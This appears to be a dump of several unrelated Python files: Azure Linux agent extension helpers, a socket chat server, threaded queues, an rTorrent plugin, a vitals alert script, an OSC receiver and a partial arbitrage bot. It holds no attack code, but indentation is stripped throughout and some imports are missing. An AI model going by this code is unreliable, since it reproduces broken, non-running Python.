hutil_log_info('Output of command "{0}": \n{1}'.format(cmd.rstrip(), output))
else:
hutil_log_info('Output: \n{0}'.format(output))
# also write output to STDERR since WA agent uploads that to Azlinux Kusto DB
# take only the last 100 characters as extension cuts off after that
try:
if exit_code != 0:
sys.stderr.write(output[-500:])
if "Permission denied" in output:
# Enable failures
# https://github.com/Azure/azure-marketplace/wiki/Extension-Build-Notes-Best-Practices#error-codes-and-messages-output-to-stderr
exit_code = 52
except:
hutil_log_info('Failed to write output to STDERR')
return exit_code, output
def run_command_with_retries_output(cmd, retries, retry_check, final_check = None,
check_error = True, log_cmd = True,
initial_sleep_time = InitialRetrySleepSeconds,
sleep_increase_factor = 1):
"""
Caller provides a method, retry_check, to use to determine if a retry
should be performed. This must be a function with two parameters:
exit_code and output
The final_check can be provided as a method to perform a final check after
retries have been exhausted
Logic used: will retry up to retries times with initial_sleep_time in
between tries
If the retry_check retuns True for retry_verbosely, we will try cmd with
the standard -v verbose flag added
"""
try_count = 0
sleep_time = initial_sleep_time
run_cmd = cmd
run_verbosely = False
while try_count <= retries:
if run_verbosely:
run_cmd = cmd + ' -v'
exit_code, output = run_command_and_log(run_cmd, check_error, log_cmd)
should_retry, retry_message, run_verbosely = retry_check(exit_code,
output)
if not should_retry:
break
try_count += 1
hutil_log_info(retry_message)
time.sleep(sleep_time)
sleep_time *= sleep_increase_factor
if final_check is not None:
exit_code = final_check(exit_code, output)
return exit_code, output
def is_dpkg_locked(exit_code, output):
"""
If dpkg is locked, the output will contain a message similar to 'dpkg
status database is locked by another process'
"""
if exit_code != 0:
dpkg_locked_search = r'^.*dpkg.+lock.*$'
dpkg_locked_re = re.compile(dpkg_locked_search, re.M)
if dpkg_locked_re.search(output):
return True
return False
def retry_if_dpkg_locked(exit_code, output):
"""
Some commands fail because the package manager is locked (apt-get/dpkg
only); this will allow retries on failing commands.
"""
retry_verbosely = False
dpkg_locked = is_dpkg_locked(exit_code, output)
apt_get_exit_code, apt_get_output = run_get_output('which apt-get',
chk_err = False,
log_cmd = False)
if dpkg_locked:
return True, 'Retrying command because package manager is locked.', \
retry_verbosely
else:
return False, '', False
def final_check_if_dpkg_locked(exit_code, output):
"""
If dpkg is still locked after the retries, we want to return a specific
error code
"""
dpkg_locked = is_dpkg_locked(exit_code, output)
if dpkg_locked:
exit_code = DPKGLockedErrorCode
return exit_code
def get_settings():
"""
Retrieve the configuration for this extension operation
"""
global SettingsDict
public_settings = None
protected_settings = None
if HUtilObject is not None:
public_settings = HUtilObject.get_public_settings()
protected_settings = HUtilObject.get_protected_settings()
elif SettingsDict is not None:
public_settings = SettingsDict['public_settings']
protected_settings = SettingsDict['protected_settings']
else:
SettingsDict = {}
handler_env = get_handler_env()
try:
config_dir = str(handler_env['handlerEnvironment']['configFolder'])
except:
config_dir = os.path.join(os.getcwd(), 'config')
seq_no = get_latest_seq_no()
settings_path = os.path.join(config_dir, '{0}.settings'.format(seq_no))
try:
with open(settings_path, 'r') as settings_file:
settings_txt = settings_file.read()
settings = json.loads(settings_txt)
h_settings = settings['runtimeSettings'][0]['handlerSettings']
public_settings = h_settings['publicSettings']
SettingsDict['public_settings'] = public_settings
except:
hutil_log_error('Unable to load handler settings from ' \
'{0}'.format(settings_path))
if ('protectedSettings' in h_settings
and 'protectedSettingsCertThumbprint' in h_settings
and h_settings['protectedSettings'] is not None
and h_settings['protectedSettingsCertThumbprint'] is not None):
encoded_settings = h_settings['protectedSettings']
settings_thumbprint = h_settings['protectedSettingsCertThumbprint']
encoded_cert_path = os.path.join('/var/lib/waagent',
'{0}.crt'.format(
settings_thumbprint))
encoded_key_path = os.path.join('/var/lib/waagent',
'{0}.prv'.format(
settings_thumbprint))
decoded_settings = base64.standard_b64decode(encoded_settings)
decrypt_cmd = 'openssl smime -inform DER -decrypt -recip {0} ' \
'-inkey {1}'.format(encoded_cert_path,
encoded_key_path)
try:
session = subprocess.Popen([decrypt_cmd], shell = True,
stdin = subprocess.PIPE,
stderr = subprocess.STDOUT,
stdout = subprocess.PIPE)
output = session.communicate(decoded_settings)
except OSError:
pass
protected_settings_str = output[0]
if protected_settings_str is None:
log_and_exit('Enable', 1, 'Failed decrypting ' \
'protectedSettings')
protected_settings = ''
try:
protected_settings = json.loads(protected_settings_str)
except:
hutil_log_error('JSON exception decoding protected settings')
SettingsDict['protected_settings'] = protected_settings
return public_settings, protected_settings
def update_status_file(operation, exit_code, exit_status, message):
"""
Mimic HandlerUtil method do_status_report in case hutil method is not
available
Write status to status file
"""
handler_env = get_handler_env()
try:
extension_version = str(handler_env['version'])
status_dir = str(handler_env['handlerEnvironment']['statusFolder'])
except:
extension_version = "1.0"
status_dir = os.path.join(os.getcwd(), 'status')
status_txt = [{
"version" : extension_version,
"timestampUTC" : time.strftime("%Y-%m-%dT%H:%M:%SZ", time.gmtime()),
"status" : {
"name" : "Microsoft.Azure.Monitor.AzureMonitorLinuxAgent",
"operation" : operation,
"status" : exit_status,
"code" : exit_code,
"formattedMessage" : {
"lang" : "en-US",
"message" : message
}
}
}]
status_json = json.dumps(status_txt)
# Find the most recently changed config file and then use the
# corresponding status file
latest_seq_no = get_latest_seq_no()
status_path = os.path.join(status_dir, '{0}.status'.format(latest_seq_no))
status_tmp = '{0}.tmp'.format(status_path)
with open(status_tmp, 'w+') as tmp_file:
tmp_file.write(status_json)
os.rename(status_tmp, status_path)
def get_handler_env():
"""
Set and retrieve the contents of HandlerEnvironment.json as JSON
"""
global HandlerEnvironment
if HandlerEnvironment is None:
handler_env_path = os.path.join(os.getcwd(), 'HandlerEnvironment.json')
try:
with open(handler_env_path, 'r') as handler_env_file:
handler_env_txt = handler_env_file.read()
handler_env = json.loads(handler_env_txt)
if type(handler_env) == list:
handler_env = handler_env[0]
HandlerEnvironment = handler_env
except Exception as e:
waagent_log_error(str(e))
return HandlerEnvironment
def get_latest_seq_no():
"""
Determine the latest operation settings number to use
"""
global SettingsSequenceNumber
if SettingsSequenceNumber is None:
handler_env = get_handler_env()
try:
config_dir = str(handler_env['handlerEnvironment']['configFolder'])
except:
config_dir = os.path.join(os.getcwd(), 'config')
latest_seq_no = -1
cur_seq_no = -1
latest_time = None
try:
for dir_name, sub_dirs, file_names in os.walk(config_dir):
for file_name in file_names:
file_basename = os.path.basename(file_name)
match = re.match(r'[0-9]{1,10}\.settings', file_basename)
if match is None:
continue
cur_seq_no = int(file_basename.split('.')[0])
file_path = os.path.join(config_dir, file_name)
cur_time = os.path.getmtime(file_path)
if latest_time is None or cur_time > latest_time:
latest_time = cur_time
latest_seq_no = cur_seq_no
except:
pass
if latest_seq_no < 0:
latest_seq_no = 0
SettingsSequenceNumber = latest_seq_no
return SettingsSequenceNumber
def run_get_output(cmd, chk_err = False, log_cmd = True):
"""
Mimic waagent mothod RunGetOutput in case waagent is not available
Run shell command and return exit code and output
"""
if 'Utils.WAAgentUtil' in sys.modules:
# WALinuxAgent-2.0.14 allows only 2 parameters for RunGetOutput
# If checking the number of parameters fails, pass 2
try:
sig = inspect.signature(waagent.RunGetOutput)
params = sig.parameters
waagent_params = len(params)
except:
try:
spec = inspect.getargspec(waagent.RunGetOutput)
params = spec.args
waagent_params = len(params)
except:
waagent_params = 2
if waagent_params >= 3:
exit_code, output = waagent.RunGetOutput(cmd, chk_err, log_cmd)
else:
exit_code, output = waagent.RunGetOutput(cmd, chk_err)
else:
try:
output = subprocess.check_output(cmd, stderr = subprocess.STDOUT,
shell = True)
exit_code = 0
except subprocess.CalledProcessError as e:
exit_code = e.returncode
output = e.output
output = output.encode('utf-8')
# On python 3, encode returns a byte object, so we must decode back to a string
if sys.version_info >= (3,):
output = output.decode('utf-8', 'ignore')
return exit_code, output.strip()
def init_waagent_logger():
"""
Initialize waagent logger
If waagent has not been imported, catch the exception
"""
try:
waagent.LoggerInit('/var/log/waagent.log', '/dev/stdout', True)
except Exception as e:
print('Unable to initialize waagent log because of exception ' \
'{0}'.format(e))
def waagent_log_info(message):
"""
Log informational message, being cautious of possibility that waagent may
not be imported
"""
if 'Utils.WAAgentUtil' in sys.modules:
waagent.Log(message)
else:
print('Info: {0}'.format(message))
def waagent_log_error(message):
"""
Log error message, being cautious of possibility that waagent may not be
imported
"""
if 'Utils.WAAgentUtil' in sys.modules:
waagent.Error(message)
else:
print('Error: {0}'.format(message))
def hutil_log_info(message):
"""
Log informational message, being cautious of possibility that hutil may
not be imported and configured
"""
if HUtilObject is not None:
HUtilObject.log(message)
else:
print('Info: {0}'.format(message))
def hutil_log_error(message):
"""
Log error message, being cautious of possibility that hutil may not be
imported and configured
"""
if HUtilObject is not None:
HUtilObject.error(message)
else:
print('Error: {0}'.format(message))
def log_and_exit(operation, exit_code = 1, message = ''):
"""
Log the exit message and perform the exit
"""
if exit_code == 0:
waagent_log_info(message)
hutil_log_info(message)
exit_status = 'success'
else:
waagent_log_error(message)
hutil_log_error(message)
exit_status = 'failed'
if HUtilObject is not None:
HUtilObject.do_exit(exit_code, operation, exit_status, str(exit_code),
message)
else:
update_status_file(operation, str(exit_code), exit_status, message)
sys.exit(exit_code)
# Exceptions
# If these exceptions are expected to be caught by the main method, they
# include an error_code field with an integer with which to exit from main
class AzureMonitorAgentForLinuxException(Exception):
"""
Base exception class for all exceptions; as such, its error code is the
basic error code traditionally returned in Linux: 1
"""
error_code = 1
def get_error_message(self, operation):
"""
Return a descriptive error message based on this type of exception
"""
return '{0} failed with exit code {1}'.format(operation,
self.error_code)
class ParameterMissingException(AzureMonitorAgentForLinuxException):
"""
There is a missing parameter for the AzureMonitorLinuxAgent Extension
"""
error_code = MissingorInvalidParameterErrorCode
def get_error_message(self, operation):
return '{0} failed due to a missing parameter: {1}'.format(operation,
self)
if __name__ == '__main__' :
main()
|
server.py
|
import socket
from threading import Thread
# server's IP address
SERVER_HOST = "0.0.0.0"
SERVER_PORT = 5002 # port we want to use
separator_token = "<SEP>" # we will use this to separate the client name & message
# initialize list/set of all connected client's sockets
client_sockets = set()
# create a TCP socket
s = socket.socket()
# make the port as reusable port
s.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
# bind the socket to the address we specified
s.bind((SERVER_HOST, SERVER_PORT))
# listen for upcoming connections
s.listen(5)
print(f"[*] Listening as {SERVER_HOST}:{SERVER_PORT}")
def listen_for_client(cs):
"""
This function keep listening for a message from `cs` socket
Whenever a message is received, broadcast it to all other connected clients
"""
while True:
try:
# keep listening for a message from `cs` socket
msg = cs.recv(1024).decode()
except Exception as e:
# client no longer connected
# remove it from the set
print(f"[!] Error: {e}")
client_sockets.remove(cs)
else:
# if we received a message, replace the <SEP>
# token with ": " for nice printing
msg = msg.replace(separator_token, ": ")
# iterate over all connected sockets
for client_socket in client_sockets:
# and send the message
client_socket.send(msg.encode())
while True:
# we keep listening for new connections all the time
client_socket, client_address = s.accept()
print(f"[+] {client_address} connected.")
# add the new connected client to connected sockets
client_sockets.add(client_socket)
# start a new thread that listens for each client's messages
t = Thread(target=listen_for_client, args=(client_socket,))
# make the thread daemon so it ends whenever the main thread ends
t.daemon = True
# start the thread
t.start()
# close client sockets
for cs in client_sockets:
cs.close()
# close server socket
s.close()
|
threaded_queues.py
|
import csv
import queue
import threading
class ThreadedQueue(queue.Queue):
"""Abstract implementation of a multi-threaded queue processor
To implement a concrete multi-threaded queue processor based on ThreadedQueue, the following methods must be implemented:
process_item(item)
"""
def __init__(self, threads, *args, **kwargs):
"""Initialize instance dependencies and start the specified number of threads"""
super().__init__(*args, **kwargs)
self.exception = None
self.is_running = False
self.start(threads)
def start(self, threads):
"""Start the specified number of threads"""
if not self.is_running:
self.is_running = True
for thread_count in range(threads):
thread = threading.Thread(target=self.do_work, daemon=True)
thread.start()
def do_work(self):
"""Repeatedly get items and process them"""
while self.is_running:
item = None
try:
item = self.get_nowait()
except queue.Empty:
pass
if item is not None:
try:
self.process_item(item)
except BaseException as e:
self.stop(e)
finally:
self.task_done()
def put(self, item):
"""Add item to the queue if the queue is running"""
if self.is_running:
super().put(item)
def stop(self, exception=None):
"""Stop all threads"""
if self.is_running:
self.is_running = False
if exception is not None and self.exception is None:
self.exception = exception
self.clear()
def clear(self):
"""Remove all pending items from the queue without processing them"""
while not self.empty():
try:
self.get_nowait()
self.task_done()
except queue.Empty:
pass
class WorkerQueue(ThreadedQueue):
"""A concrete implementation of ThreadedQueue that processes worker tasks"""
def add_item(self, target, target_args=None, target_kwargs=None, callback=None):
"""Add an item to the queue"""
self.put({
'target': target,
'target_args': target_args,
'target_kwargs': target_kwargs,
'callback': callback
})
def process_item(self, item):
"""Process the specified item"""
target = item['target']
target_args = item['target_args']
target_kwargs = item['target_kwargs']
callback = item['callback']
if target_args is None: target_args=[]
if target_kwargs is None: target_kwargs={}
output = target(*target_args, **target_kwargs)
if callback is not None:
callback(output)
class QueuedCsvWriter(ThreadedQueue):
"""A concrete implementation of ThreadedQueue that allows multiple threads to write to a single CSV file"""
def __init__(self, csv_file, *args, **kwargs):
super().__init__(threads=1, *args, **kwargs)
self.csv_writer = csv.writer(csv_file)
def writerow(self, row):
"""Add the specified row to the queue"""
self.put(row)
def process_item(self, row):
"""Write the specified row to the output file"""
self.csv_writer.writerow(row)
|
rtorrent.py
|
import datetime
import os
import re
import requests
import threading
import xmlrpc.client
from pathlib import Path
from typing import List, Optional
from platypush.context import get_bus
from platypush.plugins import action
from platypush.plugins.torrent import TorrentPlugin
from platypush.message.event.torrent import \
TorrentDownloadStartEvent, TorrentDownloadedMetadataEvent, TorrentDownloadProgressEvent, \
TorrentDownloadCompletedEvent, TorrentPausedEvent, TorrentResumedEvent, TorrentQueuedEvent, TorrentRemovedEvent, \
TorrentEvent
class RtorrentPlugin(TorrentPlugin):
"""
Plugin to interact search, download and manage torrents through RTorrent.
The usage of this plugin is advised over :class:`platypush.plugins.torrent.TorrentPlugin`, as RTorrent is a more
flexible and optimized solution for downloading and managing torrents compared to the Platypush native plugin.
Configuration:
- Install ``rtorrent`` on your system - on Debian/Ubuntu/Raspbian::
apt-get install rtorrent
- Configure the ``rtorrent`` XML/RPC interface, usually by adding the following lines to your
``~/.rtorrent.rc``:
.. code-block:: yaml
# Enable XML/RPC
scgi_local = /home/user/.rpc.socket
- Use a web server to bridge the RPC interface exposed by RTorrent over HTTP. Some configuration examples are
available `here <https://github.com/rakshasa/rtorrent/wiki/RPC-Setup-XMLRPC>`_. I usually use ``lighttpd``
because it's easy to configure and it comes with a built-in SCGI module. Install the server e.g. using
``apt``::
apt-get install lighttpd
- Create a base configuration file like this under e.g. ``~/.config/rtorrent/lighttpd.conf``:
.. code-block:: python
### Base configuration
server.modules = (
"mod_indexfile",
"mod_access",
"mod_alias",
"mod_redirect",
)
# Make sure that all the directories exist.
# server.document-root isn't really needed, but lighttpd
# won't start if it doesn't find a document root.
server.document-root = "/home/user/.local/share/rtorrent/html"
server.upload-dirs = ( "/home/user/.cache/uploads" )
server.errorlog = "/home/user/.local/log/rtorrent/error.log"
server.pid-file = "/home/user/.local/run/lighttpd.pid"
server.username = "your-user"
server.groupname = "your-group"
server.port = 5000
index-file.names = ( "index.html" )
### Configure the RTorrent XML/RPC endpoint
server.modules += ( "mod_scgi" )
scgi.server = (
# Bind an endpoint called /RPC2 to your local interface
"/RPC2" =>
( "127.0.0.1" =>
(
# Read from the RTorrent XML/RPC socket
"socket" => "/home/user/.rpc.socket",
"check-local" => "disable",
"disable-time" => 0, # don't disable scgi if connection fails
)
)
)
- Start the HTTP service, and optionally enable it as a system/user service::
lighttpd -f ~/.config/rtorrent/lighttpd.conf
- Start RTorrent and check that the XML/RPC interface works:
.. code-block:: bash
$ xmlrpc localhost:8000 system.listMethods
# Should return a list with all the methods exposed by RTorrent.
$ xmlrpc localhost:5000 download_list
Result:
Array of 0 items:
- It is advised to let the RTorrent instance run in e.g. ``screen`` or ``tmux`` on the server machine - it is
more reliable than letting the plugin start/stop the instance, and you have an easy CLI interface to attach
to manage/monitor your torrents.
- In this example, the URL to configure in the plugin would be ``http://localhost:5000/RPC2``.
Triggers:
* :class:`platypush.message.event.torrent.TorrentQueuedEvent` when a new torrent transfer is queued.
* :class:`platypush.message.event.torrent.TorrentRemovedEvent` when a torrent transfer is removed.
* :class:`platypush.message.event.torrent.TorrentDownloadStartEvent` when a torrent transfer starts.
* :class:`platypush.message.event.torrent.TorrentDownloadedMetadataEvent` when the metadata of a torrent
transfer has been downloaded.
* :class:`platypush.message.event.torrent.TorrentDownloadProgressEvent` when a transfer is progressing.
* :class:`platypush.message.event.torrent.TorrentPausedEvent` when a transfer is paused.
* :class:`platypush.message.event.torrent.TorrentResumedEvent` when a transfer is resumed.
* :class:`platypush.message.event.torrent.TorrentDownloadCompletedEvent` when a transfer is completed.
"""
def __init__(self, url: str, poll_seconds: float = 5.0, torrent_files_dir: str = '~/.rtorrent/watch', **kwargs):
"""
:param url: HTTP URL that exposes the XML/RPC interface of RTorrent (e.g. ``http://localhost:5000/RPC2``).
:param poll_seconds: How often the plugin will monitor for changes in the torrent state (default: 5 seconds).
:param torrent_files_dir: Directory where torrents and metadata files will be downloaded
(default: ``~/.rtorrent/watch``).
"""
super().__init__(**kwargs)
self.torrent_files_dir = os.path.abspath(os.path.expanduser(torrent_files_dir))
Path(self.torrent_files_dir).mkdir(parents=True, exist_ok=True, mode=0o755)
self._monitor_stop = threading.Event()
self._monitor_thread: Optional[threading.Thread] = None
self._last_status = {}
self._torrent_urls = {}
self._status_lock = threading.RLock()
self.poll_seconds = poll_seconds
self.url = url
self.client = xmlrpc.client.Server(self.url)
self.methods = set(self._list_methods())
self.start_monitor()
def _get_client(self) -> xmlrpc.client.Server:
return xmlrpc.client.Server(self.url)
def _fire_event(self, event: TorrentEvent, *_, **__):
bus = get_bus()
bus.post(event)
def _process_events(self, status: dict, last_status: dict):
if not status:
self._fire_event(TorrentRemovedEvent(**last_status))
return
if not last_status:
self._fire_event(TorrentQueuedEvent(**status))
progress = status.get('progress', 0)
name = status.get('name')
start_date = status.get('start_date')
finish_date = status.get('finish_date')
is_active = status.get('is_active')
if name and not last_status.get('name'):
self._fire_event(TorrentDownloadedMetadataEvent(**status))
if start_date and not last_status.get('start_date'):
self._fire_event(TorrentDownloadStartEvent(**status))
if is_active and not last_status.get('is_active'):
self._fire_event(TorrentResumedEvent(**status))
elif not is_active and last_status.get('is_active'):
self._fire_event(TorrentPausedEvent(**status))
if progress > 0:
if progress > last_status.get('progress', 0):
self._fire_event(TorrentDownloadProgressEvent(**status))
if finish_date and not last_status.get('finish_date'):
self._fire_event(TorrentDownloadCompletedEvent(**status))
def _torrent_monitor(self, *_, **__):
def thread():
self.logger.info('Starting torrent monitoring')
while not self._monitor_stop.is_set():
try:
# noinspection PyUnresolvedReferences
statuses = self.status().output
last_statuses = self._last_status.copy()
self._last_status = statuses
torrent_hashes = set(statuses.keys()).union(last_statuses.keys())
for torrent_hash in torrent_hashes:
self._process_events(statuses.get(torrent_hash, {}), last_statuses.get(torrent_hash, {}))
except Exception as e:
self.logger.warning('Error while monitoring torrent status')
self.logger.exception(e)
finally:
self._monitor_stop.wait(timeout=self.poll_seconds)
self.logger.info('Stopped torrent monitoring')
return thread
def _multicall(self, *args) -> List[list]:
if 'd.multicall2' in self.methods:
return self.client.d.multicall2('', *args)
if 'd.multicall' in self.methods:
return self.client.d.multicall(*args)
raise AssertionError('No multicall method available on the rtorrent interface')
@action
def start_monitor(self):
"""
Start monitoring the status of the RTorrent instance.
"""
if self._monitor_thread and self._monitor_thread.is_alive():
self.logger.info('Torrent monitoring already running')
return
self._monitor_stop.clear()
self._monitor_thread = threading.Thread(target=self._torrent_monitor())
self._monitor_thread.start()
@action
def stop_monitor(self):
"""
Stop monitoring the status of the RTorrent instance.
"""
if not (self._monitor_thread and self._monitor_thread.is_alive()):
self.logger.info('Torrent monitoring already stopped')
else:
self._monitor_stop.set()
self._monitor_thread.join(timeout=60.0)
self._monitor_thread = None
@action
def download_torrent_file(self, torrent: str) -> str:
"""
Download a torrent link to ``torrent_files_dir``.
:param torrent: Torrent URL, magnet link or local file.
:return: Path to the locally downloaded .torrent file.
"""
if torrent.startswith('magnet:?'):
# Magnet link: extract and download
m = re.search(r'xt=urn:btih:([^&/]+)', torrent)
assert m, 'Invalid magnet link: {}'.format(torrent)
torrent_hash = m.group(1)
torrent_file = os.path.join(self.torrent_files_dir, '{}.torrent'.format(torrent_hash))
with open(torrent_file, 'w') as f:
f.write('d10:magnet-uri{length}:{info}e'.format(length=len(torrent), info=torrent))
self._torrent_urls[torrent_hash] = torrent
return torrent_file
if torrent.startswith('http://') or torrent.startswith('https://'):
# HTTP resource
info = requests.get(torrent).text
torrent_file = os.path.join(self.torrent_files_dir, torrent.split('/')[-1])
if not torrent_file.endswith('.torrent'):
torrent_file += '.torrent'
with open(torrent_file, 'w') as f:
f.write(info)
self._torrent_urls[torrent_file.split('.')[0]] = torrent
return torrent_file
# Local torrent file
torrent_file = os.path.abspath(os.path.expanduser(torrent))
assert os.path.isfile(torrent_file), 'No such torrent file: {}'.format(torrent)
self._torrent_urls[os.path.basename(torrent_file).split('.')[0]] = 'file://' + torrent
return torrent_file
@action
def download(self, torrent: str, is_media: bool = False, *_, **__):
"""
Download a torrent.
:param torrent: Torrent to download. Supported formats:
* Magnet URLs
* Torrent URLs
* Local torrent files
:param is_media: Set it to true if you're downloading a media file that you'd like to stream as soon as the
first chunks are available. If so, then the events and the status method will only include media files
:return: The status of the torrent.
"""
# noinspection PyUnresolvedReferences
torrent_file = self.download_torrent_file(torrent).output
client = self._get_client()
client.load.start('', torrent_file)
def _list_methods(self) -> List[str]:
return self.client.system.listMethods()
@action
def list_methods(self) -> List[str]:
"""
:return: The list of methods exposed by the RTorrent instance
"""
return list(self.methods)
@action
def status(self, torrent: str = None) -> dict:
"""
Get the status of the current transfers.
:param torrent: Torrent hash.
:returns: A dictionary:
.. code-block:: json
{
"HASH1234567890": {
"hash": "HASH1234567890",
"name": "Your torrent name",
"save_path": "/home/user/Downloads/Your torrent name",
"is_active": true,
"is_open": true,
"completed_bytes": 666894336,
"download_rate": 451345,
"is_multi_file": true,
"remaining_bytes": 1482827011,
"size_bytes": 2149721347,
"load_date": "2020-09-02T18:42:19",
"peers": 0,
"state": "paused",
"start_date": "2020-09-02T18:42:19",
"finish_date": null,
"upload_rate": 143967,
"progress": 31.0,
"files": ["list", "of", "downloaded", "files"]
}
}
"""
attrs = ['hash', 'name', 'save_path', 'is_active', 'is_open', 'completed_bytes', 'download_rate',
'is_multi_file', 'remaining_bytes', 'size_bytes', 'load_date', 'peers', 'start_date',
'finish_date', 'upload_rate']
cmds = ['d.hash=', 'd.name=', 'd.directory=', 'd.is_active=', 'd.is_open=', 'd.completed_bytes=',
'd.down.rate=', 'd.is_multi_file=', 'd.left_bytes=', 'd.size_bytes=', 'd.load_date=',
'd.peers_connected=', 'd.timestamp.started=', 'd.timestamp.finished=', 'd.up.rate=']
mappers = {
'is_active': lambda v: bool(v),
'is_open': lambda v: bool(v),
'is_multi_file': lambda v: bool(v),
'load_date': lambda v: datetime.datetime.fromtimestamp(v) if v else None,
'start_date': lambda v: datetime.datetime.fromtimestamp(v) if v else None,
'finish_date': lambda v: datetime.datetime.fromtimestamp(v) if v else None,
}
with self._status_lock:
torrents = {
info[0]: {
attr: mappers[attr](info[i]) if attr in mappers else info[i]
for i, attr in enumerate(attrs)
}
for info in self._multicall('', *cmds)
}
for torrent_id, info in torrents.items():
torrents[torrent_id]['progress'] = round(100. * (info['completed_bytes']/info['size_bytes']), 1)
torrents[torrent_id]['url'] = self._torrent_urls.get(torrent_id, torrent_id)
torrents[torrent_id]['is_paused'] = not info['is_active']
torrents[torrent_id]['paused'] = not info['is_active'] # Back compatibility with TorrentPlugin
torrents[torrent_id]['size'] = info['size_bytes'] # Back compatibility with TorrentPlugin
torrents[torrent_id]['files'] = []
if not info['is_open']:
torrents[torrent_id]['state'] = 'stopped'
elif not info['is_active']:
torrents[torrent_id]['state'] = 'paused'
else:
torrents[torrent_id]['state'] = 'downloading'
if info.get('save_path'):
torrents[torrent_id]['files'] = list(str(f) for f in Path(info['save_path']).rglob('*')) \
if info.get('is_multi_file') else info['save_path']
return torrents.get(torrent, {}) if torrent else torrents
@action
def open(self, torrent: str) -> dict:
"""
Open a loaded torrent transfer.
:param torrent: Torrent hash.
:return: The status of the torrent.
"""
self.client.d.open(torrent)
return self.status(torrent).output
@action
def pause(self, torrent: str) -> dict:
"""
Pause a torrent transfer.
:param torrent: Torrent hash.
:return: The status of the torrent.
"""
self.client.d.pause(torrent)
return self.status(torrent).output
@action
def resume(self, torrent) -> dict:
"""
Resume a torrent transfer.
:param torrent: Torrent hash.
:return: The status of the torrent.
"""
self.client.d.resume(torrent)
return self.status(torrent).output
@action
def stop(self, torrent) -> dict:
"""
Stop a torrent transfer.
:param torrent: Torrent hash.
:return: The status of the torrent.
"""
self.client.d.stop(torrent)
return self.status(torrent).output
@action
def remove(self, torrent):
"""
Stop and remove a torrent transfer (without removing the downloaded files).
:param torrent: Torrent hash.
"""
self.client.d.stop(torrent)
self.client.d.erase(torrent)
@action
def quit(self):
"""
Terminate all the active transfers and quit the monitor.
"""
# noinspection PyUnresolvedReferences
torrents = list(self.status().output.keys()).copy()
for torrent in torrents:
self.remove(torrent)
self.stop_monitor()
@action
def execute(self, method: str, *args, **kwargs):
"""
Execute a raw command over the RTorrent RPC interface.
:param method: Method name.
:param args: Method arguments.
:param kwargs: Method keyword-arguments.
:return: Anything returned by the RPC method.
"""
method = getattr(self.client, method)
return method(*args, **kwargs)
# vim:sw=4:ts=4:et:
|
Implement.py
|
import time
import threading
import Input_module
from Analyzer import Analyzer
import Output_Module
def process():
# user_id, age, gender, heartrate, Systolic_BP, Diastolic_BP, blood_oxygen, temperature, time):
#def __init__(self, Systolic_BP, Diastolic_BP, Heart_Rate, Heart_Oxy_Level, Body_temp):
data=Input_module.input()
time.sleep(0.5)
for idx,content in enumerate(data):
process=Analyzer(data[idx]["Systolic_BP"],data[idx]["Diastolic_BP"],data[idx]["heartrate"],data[idx]["blood_oxygen"],data[idx]["temperature"])
signal_loss=process.Signal_Loss(data[idx]["heartrate"],data[idx]["temperature"])
shock_alert=process.Shock_Alert(data[idx]["heartrate"],data[idx]["temperature"])
oxygen_supply=process.Oxygen_Supply(data[idx]["blood_oxygen"])
fever=process.Fever(data[idx]["temperature"])
hypotension=process.Hypotension(data[idx]["Systolic_BP"],data[idx]["Diastolic_BP"])
hypertension=process.Hypertension(data[idx]["Systolic_BP"],data[idx]["Diastolic_BP"])
result=Output_Module.display_basic_iuput_data(signal_loss, shock_alert, oxygen_supply, fever, hypotension, hypertension)
print('--------------------------------------')
print ('Patient No', idx, 'Alert')
for index in result:
print(index,':',result[index])
def main():
#t1 = threading.Thread(target=Input_module.input())
t2 = threading.Thread(target=process)
#t1.start()
t2.start()
#t1.join()
t2.join()
if __name__ == '__main__':
main()
|
osc_receive.py
|
#!/usr/bin/python
import OSC
import time, threading
# tupple with ip, port.
receive_address = '127.0.0.1' , 7000
# OSC Server.
s = OSC.OSCServer(receive_address)
# this registers a 'default' handler (for unmatched messages),
# an /'error' handler, an '/info' handler.
# And, if the client supports it, a '/subscribe' & '/unsubscribe' handler
s.addDefaultHandlers()
def B(addr, tags, stuff, source):
# print addr #/print
# print tags #sif
print stuff #['Test', 2500, 3.140000104904175]
# print source #('127.0.0.1', 40232)
def samplerate(addr, tags, stuff, source):
print ""
s.addMsgHandler("/print", B) # adding our function
s.addMsgHandler("/_samplerate", samplerate) #OSC client automatically sends sample rate data, just routing to do mostly nothing
# just checking which handlers we have added
print "Registered Callback-functions are :"
for addr in s.getOSCAddressSpace():
print addr
# Start OSCServer
print "\nStarting OSCServer. Use ctrl-C to quit."
st = threading.Thread( target = s.serve_forever )
st.start()
try :
while 1 :
time.sleep(5)
except KeyboardInterrupt :
print "\nClosing OSCServer."
s.close()
print "Waiting for Server-thread to finish"
st.join() ##!!!
print "Done"
|
btccpro_okspot.py
|
import logging
import config
import time
from .observer import Observer
from .emailer import send_email
from fiatconverter import FiatConverter
from private_markets import okcoincny,btccprocny
import os, time
import sys
import traceback
from .basicbot import BasicBot
# python3 arbitrage/arbitrage.py -oBTCCPro_OkSpot -mBtccProCNY,OKCoinCNY
class BTCCPro_OkSpot(BasicBot):
exchange = 'BtccProCNY'
hedger = 'OKCoinCNY'
def __init__(self):
super().__init__()
self.clients = {
"OKCoinCNY": okcoincny.PrivateOkCoinCNY(config.OKCOIN_API_KEY, config.OKCOIN_SECRET_TOKEN),
"BtccProCNY": btccprocny.PrivateBtccProCNY(),
}
self.trade_wait = config.trade_wait # in seconds
self.last_trade = 0
self.init_btc = {'OKCoinCNY':500, 'BtccProCNY':500}
self.init_cny = {'OKCoinCNY':100, 'BtccProCNY':100}
self.spread = 0.1
self.simluate = True
t = threading.Thread(target = self.msg_server)
t.start()
logging.info('BTCCPro_OkSpot Setup complete')
# time.sleep(2)
def process_message(self,message):
kexchange = self.exchange
try:
message = message.decode('utf-8')
message = json.loads(message)
logging.info('msg:%s', message)
type = message['type']
price = message['price']
logging.info('msg type:%s %s', type, price)
if type == 'buy':
buy_orders = self.get_orders('buy')
buy_orders.sort(key=lambda x: x['price'], reverse=True)
for buy_order in buy_orders:
if buy_order['price'] == price:
self.cancel_order(kexchange, 'buy', buy_order['id'])
break
elif type == 'sell':
sell_orders = self.get_orders('sell')
sell_orders.sort(key=lambda x: x['price'])
for sell_order in sell_orders:
if sell_order['price'] == price:
self.cancel_order(kexchange, 'sell', sell_order['id'])
break
except Exception as e:
logging.error("process message exception %s", e)
traceback.print_exc()
def hedgeALG1(self, depths):
# update price
try:
bid_price = (depths[self.exchange]["bids"][0]['price'])
